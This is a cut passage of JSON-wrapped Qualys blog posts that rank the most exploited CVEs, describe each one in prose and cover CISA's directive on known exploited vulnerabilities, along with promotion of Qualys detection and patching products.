due to their widespread usage and potential for exploiting security weaknesses.**\n * Organizations should leverage threat intelligence to prioritize vulnerabilities that reduce the risk of exploitation.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a **TruRisk score of 90 or higher,** greatly simplifying the prioritization process.\n\nConcluding this series in the next blog we will discuss the _**15 most exploited vulnerabilitie**_**_s ever_**.\n\nWatch out for our next blog.\n\n## References\n\n * <https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>\n * <https://blog.qualys.com/qualys-insights/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>\n * <https://blog.qualys.com/vulnerabilities-threat-research/2022/12/16/implement-risk-based-vulnerability-management-with-qualys-trurisk-part-2>\n * <https://blog.qualys.com/qualys-insights/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>\n\n## Additional Contributor\n\nShreya Salvi, Data Scientist, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-07-18T13:38:53", "type": "qualysblog", "title": "Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-0903", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0601", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-07-18T13:38:53", "id": "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-25T15:25:50", "description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware &amp; ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors &amp; By-Products\n\n**Fig 1. Top Vulnerable Vendor**\n\n**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. \n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office&#x27;s Equation Editor. It could enable an attacker to execute arbitrary code under the current user&#x27;s permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user&#x27;s security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim&#x27;s machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft&#x27;s Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or &quot;ETERNALBLUE,&quot; or &quot;ETERNALSYNERGY&quot; or &quot;ETERNAL ROMANCE&quot; is a remote code execution vulnerability in Microsoft&#x27;s Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the &quot;HotSpot&quot; component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user&#x27;s system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. **CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-44228, or &quot;Log4Shell,&quot; is a severe vulnerability in Apache&#x27;s log4j Java library. The flaw exploits the &#x27;lookups&#x27; feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. **CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash&#x27;s processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows&#x27; VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2019-19781, or &quot;Shitrix,&quot; is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user&#x27;s context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users&#x27; mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian&#x27;s Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights &amp; Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-04T14:00:00", "type": "qualysblog", "title": "Qualys Top 20 Most Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0074", "CVE-2014-6271", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2018-13379", "CVE-2018-8174", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-2725", "CVE-2020-1472", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-09-04T14:00:00", "id": "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud 